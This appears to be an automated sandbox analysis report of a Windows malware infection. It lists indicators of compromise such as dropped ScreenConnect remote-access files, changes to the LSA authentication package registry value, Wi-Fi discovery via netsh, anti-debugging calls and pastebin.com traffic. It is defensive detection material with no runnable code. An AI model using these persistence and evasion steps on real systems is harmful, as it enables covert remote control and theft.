description ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 200 pastebin.com 189 pastebin.com 191 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 176 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000023dc0-1292.dat autoit_exe behavioral1/files/0x0007000000023dfb-1665.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800630061006600320030003700630030006300660038003700350038003700620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db ScreenConnect.WindowsBackstageShell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (caf207c0cf87587b)\0rqyhxwb.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (caf207c0cf87587b)\0rqyhxwb.newcfg ScreenConnect.ClientService.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db ScreenConnect.WindowsBackstageShell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 2100 1C08r9.exe 1784 rapes.exe 2644 2z6185.exe 3208 79IPEWNE3VYWXIRFO98X.exe 4932 3i59G.exe 1952 cuFIzyH.exe 5844 rapes.exe 1500 TempWKRN6JMW5JDKQAQZC5RJY3P67PPDZHKL.EXE 5528 47caa411ec.exe 3012 483d2fa8a0d53818306efeb32d3.exe 4132 9643d36073.exe 976 OGLB96BFUO977CR17OZ9DP1ZT.exe 6496 650fe465b0.exe 7164 rapes.exe 7408 0320a92a1a.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5892 set thread context of 5980 5892 iZ73hNr.exe 156 PID 3512 set thread context of 5520 3512 P2SXMuh.exe 162 -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\Client.Override.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (caf207c0cf87587b)\Client.en-US.resources msiexec.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI8A1.tmp msiexec.exe File created C:\Windows\Installer\wix{1303098E-5689-484B-D43C-0C0F16A11948}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{1303098E-5689-484B-D43C-0C0F16A11948} msiexec.exe File opened for modification C:\Windows\Installer\MSI8F0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA1A.tmp msiexec.exe File created C:\Windows\Installer\e59075b.msi msiexec.exe File created C:\Windows\Installer\{1303098E-5689-484B-D43C-0C0F16A11948}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\{1303098E-5689-484B-D43C-0C0F16A11948}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\rapes.job 1C08r9.exe File created C:\Windows\Installer\e590759.msi msiexec.exe File opened for modification C:\Windows\Installer\e590759.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2z6185.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_ipKwUq9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iZ73hNr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language P2SXMuh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 040ff96d683274d16cbc8c7ca89c7748ce4dbec985b05044fb3cd4258dd9e732.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempWKRN6JMW5JDKQAQZC5RJY3P67PPDZHKL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9643d36073.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 5a290de29e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 79IPEWNE3VYWXIRFO98X.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 5a290de29e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vKdwCHJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iZ73hNr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1C08r9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cuFIzyH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OGLB96BFUO977CR17OZ9DP1ZT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipKwUq9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0320a92a1a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 47caa411ec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3i59G.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 499ecee7cb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HHPgDSI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language q5e62.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 650fe465b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5a290de29e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4968 cmd.exe 5944 netsh.exe 5636 cmd.exe 3064 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000b75d2027c317cd460000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000b75d20270000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900b75d2027000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1db75d2027000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000b75d202700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Checks processor information in registry 2 TTPs 22 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier ._cache_Synaptics.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier ._cache_ipKwUq9.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 ._cache_Synaptics.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3i59G.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 ._cache_ipKwUq9.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3i59G.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1528 timeout.exe -
Enumerates system info in registry 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Kills process with taskkill 5 IoCs
pid Process 4444 taskkill.exe 3176 taskkill.exe 6128 taskkill.exe 5952 taskkill.exe 4692 taskkill.exe -
Modifies data under HKEY_USERS 30 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\WindowMetrics\MinHorzGap = "0" ScreenConnect.WindowsBackstageShell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsBackstageShell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Mouse\MouseHoverTime = "750" ScreenConnect.WindowsBackstageShell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsBackstageShell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsBackstageShell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsBackstageShell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133860803823470915" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\WindowMetrics\MinVertGap = "0" ScreenConnect.WindowsBackstageShell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsBackstageShell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\WindowMetrics\MinArrange = "8" ScreenConnect.WindowsBackstageShell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\WindowMetrics\MinWidth = "0" ScreenConnect.WindowsBackstageShell.exe -
Modifies registry class 40 IoCs
